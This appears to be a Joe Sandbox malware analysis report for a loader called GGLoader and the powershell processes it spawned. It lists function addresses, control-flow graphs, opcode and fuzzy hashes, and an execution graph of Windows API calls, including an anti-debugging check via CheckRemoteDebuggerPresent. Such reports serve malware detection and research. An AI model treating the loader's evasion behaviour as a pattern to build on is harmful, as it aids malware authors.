Function_00007FFD9B882938 78 Function_00007FFD9B882A88 48->78 49 Function_00007FFD9B886020 50 Function_00007FFD9B881A1D 51 Function_00007FFD9B880829 52 Function_00007FFD9B885D25 54 Function_00007FFD9B885853 55 Function_00007FFD9B885D4D 56 Function_00007FFD9B88054D 57 Function_00007FFD9B88014D 59 Function_00007FFD9B880440 60 Function_00007FFD9B885974 61 Function_00007FFD9B88086D 61->14 61->38 62 Function_00007FFD9B885964 63 Function_00007FFD9B880060 64 Function_00007FFD9B885E60 66 Function_00007FFD9B880592 67 Function_00007FFD9B885890 69 Function_00007FFD9B88028D 70 Function_00007FFD9B885C99 70->67 75 Function_00007FFD9B885880 70->75 94 Function_00007FFD9B8858A0 70->94 71 Function_00007FFD9B883498 72->8 73 Function_00007FFD9B880582 76 Function_00007FFD9B88017D 77 Function_00007FFD9B882E7D 79 Function_00007FFD9B881786 80->8 81 Function_00007FFD9B8826B3 82 Function_00007FFD9B8808AD 82->2 82->7 82->35 83 Function_00007FFD9B8800AD 84 Function_00007FFD9B8802AD 85 Function_00007FFD9B8836AD 88 Function_00007FFD9B8838A3 85->88 86 Function_00007FFD9B884CB6 86->11 87->8 89 Function_00007FFD9B8850A2 89->40 90 Function_00007FFD9B8803A2 91 Function_00007FFD9B8805A2 92 Function_00007FFD9B880BA2 92->47 96 Function_00007FFD9B8858D3 98 Function_00007FFD9B8848CE 98->37 99 Function_00007FFD9B8802CD 100 Function_00007FFD9B882ACD 101 Function_00007FFD9B8809D5 101->92 102 Function_00007FFD9B8823BD 103 Function_00007FFD9B8824CC 103->81 104 Function_00007FFD9B880FC8 105 Function_00007FFD9B880EC5 106 Function_00007FFD9B8832C5 106->71 107 Function_00007FFD9B8858C5

                                                                                                    Executed Functions

                                                                                                    Function 00007FFD9B885D4D Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 101 7ffd9b885d4d-7ffd9b885e0d CheckRemoteDebuggerPresent 105 7ffd9b885e0f 101->105 106 7ffd9b885e15-7ffd9b885e58 101->106 105->106
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1715511386.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_GGLoader.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                    • String ID:
                                                                                                    • API String ID: 3662101638-0
                                                                                                    • Opcode ID: 5f37f65186263232e3de33e5b14a5abc4d96ffc5ae163b2cc4634528c0cd2c1f
                                                                                                    • Instruction ID: 07f2b850a5e2c69873d6ca5f9ed9a75c4d26284d1ea3257a290f7b4ea577e0dc
                                                                                                    • Opcode Fuzzy Hash: 5f37f65186263232e3de33e5b14a5abc4d96ffc5ae163b2cc4634528c0cd2c1f
                                                                                                    • Instruction Fuzzy Hash: 9841323190C75C8FCB59DF98C84A6E97BF0EF65321F0942ABD489C7292D734A846CB91
                                                                                                    Function 00007FFD9B8842F6 Relevance: .5, Instructions: 472COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 117 7ffd9b8842f6-7ffd9b884303 118 7ffd9b88430e-7ffd9b8843d7 117->118 119 7ffd9b884305-7ffd9b88430d 117->119 122 7ffd9b884443 118->122 123 7ffd9b8843d9-7ffd9b8843e2 118->123 119->118 125 7ffd9b884445-7ffd9b88446a 122->125 123->122 124 7ffd9b8843e4-7ffd9b8843f0 123->124 126 7ffd9b8843f2-7ffd9b884404 124->126 127 7ffd9b884429-7ffd9b884441 124->127 132 7ffd9b88446c-7ffd9b884475 125->132 133 7ffd9b8844d6 125->133 128 7ffd9b884408-7ffd9b88441b 126->128 129 7ffd9b884406 126->129 127->125 128->128 131 7ffd9b88441d-7ffd9b884425 128->131 129->128 131->127 132->133 135 7ffd9b884477-7ffd9b884483 132->135 134 7ffd9b8844d8-7ffd9b884580 133->134 146 7ffd9b884582-7ffd9b88458c 134->146 147 7ffd9b8845ee 134->147 136 7ffd9b8844bc-7ffd9b8844d4 135->136 137 7ffd9b884485-7ffd9b884497 135->137 136->134 138 7ffd9b88449b-7ffd9b8844ae 137->138 139 7ffd9b884499 137->139 138->138 141 7ffd9b8844b0-7ffd9b8844b8 138->141 139->138 141->136 146->147 149 7ffd9b88458e-7ffd9b88459b 146->149 148 7ffd9b8845f0-7ffd9b884619 147->148 156 7ffd9b884683 148->156 157 7ffd9b88461b-7ffd9b884626 148->157 150 7ffd9b8845d4-7ffd9b8845ec 149->150 151 7ffd9b88459d-7ffd9b8845af 149->151 150->148 152 7ffd9b8845b3-7ffd9b8845c6 151->152 153 7ffd9b8845b1 151->153 152->152 155 7ffd9b8845c8-7ffd9b8845d0 152->155 153->152 155->150 158 7ffd9b884685-7ffd9b884716 156->158 157->156 159 7ffd9b884628-7ffd9b884636 157->159 167 7ffd9b88471c-7ffd9b88472b 158->167 160 7ffd9b88466f-7ffd9b884681 159->160 161 7ffd9b884638-7ffd9b88464a 159->161 160->158 163 7ffd9b88464e-7ffd9b884661 161->163 164 7ffd9b88464c 161->164 163->163 165 7ffd9b884663-7ffd9b88466b 163->165 164->163 165->160 168 7ffd9b884733-7ffd9b884798 call 7ffd9b8847b4 167->168 169 7ffd9b88472d 167->169 176 7ffd9b88479f-7ffd9b8847b3 168->176 177 7ffd9b88479a 168->177 169->168 177->176
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1715511386.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_GGLoader.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9c1b11edff9e8b0443dec50b7c3907077d8ca1a4caaf34d0ea67750461c42aaf
                                                                                                    • Instruction ID: bfce3e743a9032da346071bf6d1056674f3173612e567a2ebf73e6f27d8df0a6
                                                                                                    • Opcode Fuzzy Hash: 9c1b11edff9e8b0443dec50b7c3907077d8ca1a4caaf34d0ea67750461c42aaf
                                                                                                    • Instruction Fuzzy Hash: 28F1B731A09A8D8FEBA8DF28C8657E937D1FF58310F04426EE85DC7295DB3899458B81
                                                                                                    Function 00007FFD9B8850A2 Relevance: .5, Instructions: 460COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 178 7ffd9b8850a2-7ffd9b8850af 179 7ffd9b8850b1-7ffd9b8850b9 178->179 180 7ffd9b8850ba-7ffd9b885187 178->180 179->180 183 7ffd9b8851f3 180->183 184 7ffd9b885189-7ffd9b885192 180->184 185 7ffd9b8851f5-7ffd9b88521a 183->185 184->183 186 7ffd9b885194-7ffd9b8851a0 184->186 192 7ffd9b88521c-7ffd9b885225 185->192 193 7ffd9b885286 185->193 187 7ffd9b8851a2-7ffd9b8851b4 186->187 188 7ffd9b8851d9-7ffd9b8851f1 186->188 190 7ffd9b8851b8-7ffd9b8851cb 187->190 191 7ffd9b8851b6 187->191 188->185 190->190 194 7ffd9b8851cd-7ffd9b8851d5 190->194 191->190 192->193 195 7ffd9b885227-7ffd9b885233 192->195 196 7ffd9b885288-7ffd9b8852ad 193->196 194->188 197 7ffd9b88526c-7ffd9b885284 195->197 198 7ffd9b885235-7ffd9b885247 195->198 203 7ffd9b8852af-7ffd9b8852b9 196->203 204 7ffd9b88531b 196->204 197->196 199 7ffd9b88524b-7ffd9b88525e 198->199 200 7ffd9b885249 198->200 199->199 202 7ffd9b885260-7ffd9b885268 199->202 200->199 202->197 203->204 205 7ffd9b8852bb-7ffd9b8852c8 203->205 206 7ffd9b88531d-7ffd9b88534b 204->206 207 7ffd9b885301-7ffd9b885319 205->207 208 7ffd9b8852ca-7ffd9b8852dc 205->208 213 7ffd9b88534d-7ffd9b885358 206->213 214 7ffd9b8853bb 206->214 207->206 209 7ffd9b8852e0-7ffd9b8852f3 208->209 210 7ffd9b8852de 208->210 209->209 212 7ffd9b8852f5-7ffd9b8852fd 209->212 210->209 212->207 213->214 216 7ffd9b88535a-7ffd9b885368 213->216 215 7ffd9b8853bd-7ffd9b885495 214->215 226 7ffd9b88549b-7ffd9b8854aa 215->226 217 7ffd9b8853a1-7ffd9b8853b9 216->217 218 7ffd9b88536a-7ffd9b88537c 216->218 217->215 220 7ffd9b885380-7ffd9b885393 218->220 221 7ffd9b88537e 218->221 220->220 223 7ffd9b885395-7ffd9b88539d 220->223 221->220 223->217 227 7ffd9b8854b2-7ffd9b885514 call 7ffd9b885530 226->227 228 7ffd9b8854ac 226->228 235 7ffd9b88551b-7ffd9b88552f 227->235 236 7ffd9b885516 227->236 228->227 236->235
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1715511386.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_GGLoader.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8265decfe26f3b5db62023088462198d538c3ba0beb56b08c50bcbfd02d60415
                                                                                                    • Instruction ID: af6b58428ffb48a9739b2e90b80f12a97ddc7fb6b4731f9fa438218186dd78d4
                                                                                                    • Opcode Fuzzy Hash: 8265decfe26f3b5db62023088462198d538c3ba0beb56b08c50bcbfd02d60415
                                                                                                    • Instruction Fuzzy Hash: 55E1D630609A4E8FEBA8DF68C8657E937E1FF58310F04426EE85DC7295DF74A9418B81
                                                                                                    Function 00007FFD9B885F38 Relevance: 1.4, APIs: 1, Instructions: 110COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 108 7ffd9b885f38-7ffd9b885f3f 109 7ffd9b885f41-7ffd9b885f49 108->109 110 7ffd9b885f4a-7ffd9b885fe2 CloseHandle 108->110 109->110 114 7ffd9b885fe4 110->114 115 7ffd9b885fea-7ffd9b886018 110->115 114->115
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1715511386.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_GGLoader.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: 1b2df148fb691094e983fd5b36ac5eaac4ee8817ce1ac4eb67c872e994a1acb8
                                                                                                    • Instruction ID: f65e44775580aee89351469d637d7d6f3f5c1672396696cb8a5014047193ac34
                                                                                                    • Opcode Fuzzy Hash: 1b2df148fb691094e983fd5b36ac5eaac4ee8817ce1ac4eb67c872e994a1acb8
                                                                                                    • Instruction Fuzzy Hash: F531043190CA4C8FDB58DBA8C816BF9BBF0EF55320F00426ED059D3192DB74A856CB91

                                                                                                    Executed Functions

                                                                                                    Function 00007FFD9B976A25 Relevance: .4, Instructions: 439COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1979758711.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fde601912bcb8fd6af04fa957eb3a841d9ff3791760b27a6ac137fb4ca532870
                                                                                                    • Instruction ID: 580cd805c72c6c3850bb026637d294d38436edaaaae5cfbeee78cc6925e88071
                                                                                                    • Opcode Fuzzy Hash: fde601912bcb8fd6af04fa957eb3a841d9ff3791760b27a6ac137fb4ca532870
                                                                                                    • Instruction Fuzzy Hash: B3D13772B1FA8E1FE7A5ABA848A55B57BE0EF56314B0901FED44CC70E3DA18AD05C341
                                                                                                    Function 00007FFD9B8A9FC8 Relevance: .3, Instructions: 252COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1976232276.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cf32499109d6d6007be64a3feb64dbbd887e6097d118b4d994f1d1eee7da4cfc
                                                                                                    • Instruction ID: a283e720c703c42b74f993e56095be86f662e02f54afc4ddfa39b130cd0c52ec
                                                                                                    • Opcode Fuzzy Hash: cf32499109d6d6007be64a3feb64dbbd887e6097d118b4d994f1d1eee7da4cfc
                                                                                                    • Instruction Fuzzy Hash: 4211577180E7C98FDB579B748C294947FB0AE17210B0A02DBD488CB0B3D6695908C7A2
                                                                                                    Function 00007FFD9B8AA8FB Relevance: .2, Instructions: 161COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1976232276.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c438d66b1fd18fb4aea6dc5b5fa0e8edf8d5d198a6384f8207aaa07bc49ef932
                                                                                                    • Instruction ID: 8ae6333b13157490509c354eb4f12dbbde1c58758fade48a3f6eeb581d4e954f
                                                                                                    • Opcode Fuzzy Hash: c438d66b1fd18fb4aea6dc5b5fa0e8edf8d5d198a6384f8207aaa07bc49ef932
                                                                                                    • Instruction Fuzzy Hash: D7416C72A0EB8C5FEB65DBAC98965E93FE0EF56320F09407BC058C71A3ED3564068791
                                                                                                    Function 00007FFD9B8A9645 Relevance: .1, Instructions: 133COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1976232276.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c9ceb3acdee8f9f05bcdf3ea796f0f077a8d16945f7c61e547c6083e02288a5f
                                                                                                    • Instruction ID: 123ac3d8fbb734692da93f2cf33778911b092164e29d5c964cda2c7f43f2f2f6
                                                                                                    • Opcode Fuzzy Hash: c9ceb3acdee8f9f05bcdf3ea796f0f077a8d16945f7c61e547c6083e02288a5f
                                                                                                    • Instruction Fuzzy Hash: F731D23191CB4C8FDB189F5C984A6A97BE0FB99721F00426FE449C3252DB74A956CBC2
                                                                                                    Function 00007FFD9B78E6BF Relevance: .1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1973376998.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b78d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                                    • Instruction ID: fc3b3edc3dacb5c9bc56cfc46d132a86cc5bf80fbb96ae430287aa86a7d81f56
                                                                                                    • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                                    • Instruction Fuzzy Hash: 13014F3160CE088F9AA4EF1EE48595237E0FB98320710075AD41EC756AD731F891CBC1
                                                                                                    Function 00007FFD9B8A33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1976232276.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                    • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                    • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                                                                                    Function 00007FFD9B97456D Relevance: .0, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1979758711.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d49f48d5b021904caadbcd6d0daa43ac9521a56e5ed5f5023db960c658152d1a
                                                                                                    • Instruction ID: d9c3a3265308006e186e4cd60e2957e0828dfeece0f971ed66ab8b386f4279d0
                                                                                                    • Opcode Fuzzy Hash: d49f48d5b021904caadbcd6d0daa43ac9521a56e5ed5f5023db960c658152d1a
                                                                                                    • Instruction Fuzzy Hash: A7F0E232B0E5098FD768EB5CE4919A877E0FF4532071500BAE06DC76B7CA25EC40C740
                                                                                                    Function 00007FFD9B974820 Relevance: .0, Instructions: 35COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1979758711.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 65adb5a10c14eb8d05d50552459595f239955bcfdfa322fab2486d45b58655c3
                                                                                                    • Instruction ID: 60d68dceb0a419c920a41aaf96ce962fe5ace1bd58de5a30c46ff8914b6c6c60
                                                                                                    • Opcode Fuzzy Hash: 65adb5a10c14eb8d05d50552459595f239955bcfdfa322fab2486d45b58655c3
                                                                                                    • Instruction Fuzzy Hash: F2F05E32B0E5898FDB64EB5CE4919E877E0EF0532071500FAE16DCB5A3CA25AC54C740

                                                                                                    Non-executed Functions

                                                                                                    Function 00007FFD9B8A87FA Relevance: 6.3, Strings: 5, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1976232276.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: L_^$L_^$L_^$L_^$L_^
                                                                                                    • API String ID: 0-205492149
                                                                                                    • Opcode ID: cf8b465184b697936e0c93d167afd45dee8c0a5b3774993a14d791dd685514d9
                                                                                                    • Instruction ID: b6fe7eaf95c7c6877547a375bf735b1a192f8999d61a1c57eb3f44a067a98ee2
                                                                                                    • Opcode Fuzzy Hash: cf8b465184b697936e0c93d167afd45dee8c0a5b3774993a14d791dd685514d9
                                                                                                    • Instruction Fuzzy Hash: 9221DB72A2D7938FC7165A3898658E53B50AF46724F4903FACCF94F1E3EB242506C672

                                                                                                    Executed Functions

                                                                                                    Function 00007FFD9B9508A5 Relevance: .4, Instructions: 387COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1792614656.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffd9b950000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6a7d69652ea30ec097d36244e5778e2409b8cad3710aaa190509fb0db010afe0
                                                                                                    • Instruction ID: 3af174635a51198bfb5d1d3fd56a285c2c9262490a9d3777b4820a9e47159eb8
                                                                                                    • Opcode Fuzzy Hash: 6a7d69652ea30ec097d36244e5778e2409b8cad3710aaa190509fb0db010afe0
                                                                                                    • Instruction Fuzzy Hash: 8AC14732B1EA4D5FEBA4DBA894645B477D1EF99710F0900BED84DC32A3DE25AC01C741
                                                                                                    Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1792230912.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                    • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                    • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:7.5%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:6.4%
                                                                                                    Total number of Nodes:1308
                                                                                                    Total number of Limit Nodes:22
                                                                                                    execution_graph 22880 7b7baf 22885 7b7985 22880->22885 22883 7b7bee 22886 7b79a4 22885->22886 22887 7b79b7 22886->22887 22895 7b79cc 22886->22895 22905 7ae7f3 14 API calls __dosmaperr 22887->22905 22889 7b79bc 22906 7a9def 41 API calls ___std_exception_copy 22889->22906 22891 7b79c7 22891->22883 22902 7c04b7 22891->22902 22893 7b7b9d 22911 7a9def 41 API calls ___std_exception_copy 22893->22911 22900 7b7aec 22895->22900 22907 7bfd49 41 API calls 2 library calls 22895->22907 22897 7b7b3c 22897->22900 22908 7bfd49 41 API calls 2 library calls 22897->22908 22899 7b7b5a 22899->22900 22909 7bfd49 41 API calls 2 library calls 22899->22909 22900->22891 22910 7ae7f3 14 API calls __dosmaperr 22900->22910 22912 7bfe81 22902->22912 22905->22889 22906->22891 22907->22897 22908->22899 22909->22900 22910->22893 22911->22891 22915 7bfe8d __FrameHandler3::FrameUnwindToState 22912->22915 22913 7bfe94 22932 7ae7f3 14 API calls __dosmaperr 22913->22932 22915->22913 22917 7bfebf 22915->22917 22916 7bfe99 22933 7a9def 41 API calls ___std_exception_copy 22916->22933 22923 7c0449 22917->22923 22921 7bfea3 22921->22883 22935 7b9d4a 22923->22935 22928 7c047f 22930 7bfee3 22928->22930 22989 7b3705 22928->22989 22934 7bff16 LeaveCriticalSection __wsopen_s 22930->22934 22932->22916 22933->22921 22934->22921 22995 7ae806 22935->22995 22938 7b9d6e 22940 7af13d 22938->22940 23049 7aefc9 22940->23049 22943 7c04d7 22944 7c04f4 22943->22944 22945 7c0509 22944->22945 22946 7c0522 22944->22946 23088 7ae7e0 14 API calls __dosmaperr 22945->23088 23074 7bb512 22946->23074 22949 7c050e 23089 7ae7f3 14 API calls __dosmaperr 22949->23089 22951 7c0547 23087 7c0190 CreateFileW 22951->23087 22952 7c0530 23090 7ae7e0 14 API calls __dosmaperr 22952->23090 22956 7c0535 23091 7ae7f3 14 API calls __dosmaperr 22956->23091 22957 7c05fd GetFileType 22960 7c064f 22957->22960 22961 7c0608 GetLastError 22957->22961 22959 7c05d2 GetLastError 23093 7ae799 14 API calls __dosmaperr 22959->23093 23096 7bb45d 15 API calls 2 library calls 22960->23096 23094 7ae799 14 API calls __dosmaperr 22961->23094 22962 7c0580 22962->22957 22962->22959 23092 7c0190 CreateFileW 22962->23092 22966 7c0616 CloseHandle 22966->22949 22967 7c063f 22966->22967 23095 7ae7f3 14 API calls __dosmaperr 22967->23095 22969 7c05c5 22969->22957 22969->22959 22971 7c0670 22973 7c06bc 22971->22973 23097 7c039f 75 API calls 3 library calls 22971->23097 22972 7c0644 22972->22949 22977 7c06c3 22973->22977 23099 7bff42 75 API calls 4 library calls 22973->23099 22976 7c06f1 22976->22977 22978 7c06ff 22976->22978 23098 7b3873 44 API calls 2 library calls 22977->23098 22979 7c051b 22978->22979 22981 7c077b CloseHandle 22978->22981 22979->22928 23100 7c0190 CreateFileW 22981->23100 22983 7c07a6 22984 7c07b0 GetLastError 22983->22984 22985 7c07dc 22983->22985 23101 7ae799 14 API calls __dosmaperr 22984->23101 22985->22979 22987 7c07bc 23102 7bb625 15 API calls 2 library calls 22987->23102 22990 7b3710 RtlFreeHeap 22989->22990 22994 7b373a 22989->22994 22991 7b3725 GetLastError 22990->22991 22990->22994 22992 7b3732 __dosmaperr 22991->22992 23110 7ae7f3 14 API calls __dosmaperr 22992->23110 22994->22930 22996 7ae81d 22995->22996 22997 7ae824 22995->22997 22996->22938 23003 7b5012 5 API calls std::_Locinfo::_Locinfo_dtor 22996->23003 22997->22996 23004 7b2340 GetLastError 22997->23004 23001 7ae85b 23032 7b3b95 41 API calls __wsopen_s 23001->23032 23003->22938 23005 7b235c 23004->23005 23006 7b2356 23004->23006 23010 7b2360 SetLastError 23005->23010 23034 7b519f 6 API calls std::_Locinfo::_Locinfo_dtor 23005->23034 23033 7b5160 6 API calls std::_Locinfo::_Locinfo_dtor 23006->23033 23009 7b2378 23009->23010 23035 7b2a9c 23009->23035 23014 7ae845 23010->23014 23015 7b23f5 23010->23015 23031 7b3b37 41 API calls __Getcoll 23014->23031 23046 7aef69 41 API calls std::locale::_Setgloballocale 23015->23046 23016 7b23a6 23043 7b519f 6 API calls std::_Locinfo::_Locinfo_dtor 23016->23043 23017 7b2395 23042 7b519f 6 API calls std::_Locinfo::_Locinfo_dtor 23017->23042 23022 7b23a3 23028 7b3705 ___free_lconv_mon 14 API calls 23022->23028 23023 7b23b2 23024 7b23cd 23023->23024 23025 7b23b6 23023->23025 23045 7b216e 14 API calls __dosmaperr 23024->23045 23044 7b519f 6 API calls std::_Locinfo::_Locinfo_dtor 23025->23044 23028->23010 23029 7b23d8 23030 7b3705 ___free_lconv_mon 14 API calls 23029->23030 23030->23010 23031->23001 23032->22996 23033->23005 23034->23009 23040 7b2aa9 __dosmaperr 23035->23040 23036 7b2ae9 23048 7ae7f3 14 API calls __dosmaperr 23036->23048 23037 7b2ad4 RtlAllocateHeap 23039 7b238d 23037->23039 23037->23040 23039->23016 23039->23017 23040->23036 23040->23037 23047 7b1945 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 23040->23047 23042->23022 23043->23023 23044->23022 23045->23029 23047->23040 23048->23039 23050 7aeff1 23049->23050 23051 7aefd7 23049->23051 23053 7aeff8 23050->23053 23054 7af017 23050->23054 23067 7af17e 14 API calls ___free_lconv_mon 23051->23067 23055 7aefe1 23053->23055 23068 7af1bf 15 API calls __wsopen_s 23053->23068 23069 7b9a65 MultiByteToWideChar 23054->23069 23055->22928 23055->22943 23058 7af02d GetLastError 23070 7ae799 14 API calls __dosmaperr 23058->23070 23059 7af026 23059->23058 23061 7af053 23059->23061 23072 7af1bf 15 API calls __wsopen_s 23059->23072 23061->23055 23073 7b9a65 MultiByteToWideChar 23061->23073 23062 7af039 23071 7ae7f3 14 API calls __dosmaperr 23062->23071 23066 7af06a 23066->23055 23066->23058 23067->23055 23068->23055 23069->23059 23070->23062 23071->23055 23072->23061 23073->23066 23075 7bb51e __FrameHandler3::FrameUnwindToState 23074->23075 23103 7add02 EnterCriticalSection 23075->23103 23077 7bb525 23078 7bb54a 23077->23078 23083 7bb5b9 EnterCriticalSection 23077->23083 23084 7bb56c 